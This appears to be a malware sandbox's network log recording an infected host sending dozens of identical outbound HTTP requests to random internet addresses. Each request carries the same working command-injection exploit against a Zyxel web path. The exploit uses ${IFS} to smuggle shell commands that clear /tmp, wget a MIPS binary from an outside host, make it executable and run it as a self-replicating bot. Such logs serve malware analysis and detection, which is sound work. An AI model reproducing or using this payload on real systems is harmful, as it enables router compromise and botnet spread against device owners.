                                                  Jan 19, 2024 18:24:13.401304960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8720192.168.2.1338620219.159.7.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401376009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8721192.168.2.134461084.206.163.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401396036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8722192.168.2.133900068.164.167.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401438951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8723192.168.2.1341620198.140.166.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401508093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8724192.168.2.1342634197.51.140.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401520967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8725192.168.2.135712644.130.45.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401545048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8726192.168.2.1341006221.205.197.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401595116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8727192.168.2.1360342181.227.24.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401631117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8728192.168.2.1342160175.89.232.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401669025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8729192.168.2.133603270.103.69.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401710987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8730192.168.2.134010666.77.116.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401736975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8731192.168.2.135241645.133.153.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401806116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8732192.168.2.1345324202.217.206.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401861906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8733192.168.2.1339436201.103.168.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401901007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8734192.168.2.134269271.169.114.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401932955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8735192.168.2.1337220217.246.216.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.401962042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8736192.168.2.1357816192.170.240.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402034044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8737192.168.2.135077658.99.32.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402075052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8738192.168.2.1339472110.119.212.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402132988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8739192.168.2.133559689.3.144.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402170897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8740192.168.2.136044086.9.137.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402211905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8741192.168.2.1358258190.99.181.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402255058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8742192.168.2.1350090186.147.217.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402283907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8743192.168.2.1342140199.109.128.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402354956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8744192.168.2.1336896143.240.23.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402394056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8745192.168.2.135610649.178.78.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402434111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8746192.168.2.135901884.55.35.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402471066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8747192.168.2.1355970169.119.228.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402518988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8748192.168.2.1337278180.61.242.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402554989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8749192.168.2.1344848155.118.45.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402605057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8750192.168.2.135063638.38.29.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402668953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8751192.168.2.1341114113.73.40.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402688980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8752192.168.2.135171077.183.101.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402761936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8753192.168.2.134654677.238.74.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402812958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8754192.168.2.1360630135.219.210.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402847052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8755192.168.2.1357630149.80.218.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402890921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8756192.168.2.135639639.138.107.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402940035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8757192.168.2.1359784150.24.113.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.402976990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8758192.168.2.135444473.29.30.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403039932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8759192.168.2.133508671.187.22.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403078079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8760192.168.2.1336292103.145.59.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403134108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8761192.168.2.1343382134.83.247.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403157949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8762192.168.2.133545086.115.31.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403218031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8763192.168.2.135146047.174.153.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403249025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8764192.168.2.1333242121.46.0.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403300047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8765192.168.2.134064613.237.132.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403338909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8766192.168.2.1358534107.130.91.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403371096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8767192.168.2.1359826158.181.45.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403408051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8768192.168.2.133475427.35.88.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403448105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8769192.168.2.1348226107.82.56.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403493881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8770192.168.2.135724865.232.171.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403532028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8771192.168.2.135454088.104.83.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403578043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8772192.168.2.1338700217.135.208.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403623104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8773192.168.2.1357360116.132.44.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403680086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8774192.168.2.135483899.11.6.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403731108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8775192.168.2.1335394130.12.53.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403762102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8776192.168.2.133367664.180.203.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403801918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8777192.168.2.133344669.25.181.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403862953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8778192.168.2.1354608108.119.130.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403899908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8779192.168.2.1337804135.27.141.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403951883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8780192.168.2.1347582170.88.95.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.403995037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8781192.168.2.1353964106.5.64.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404033899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8782192.168.2.1342146212.123.103.11443
                                                  TimestampBytes transferredDirectionData
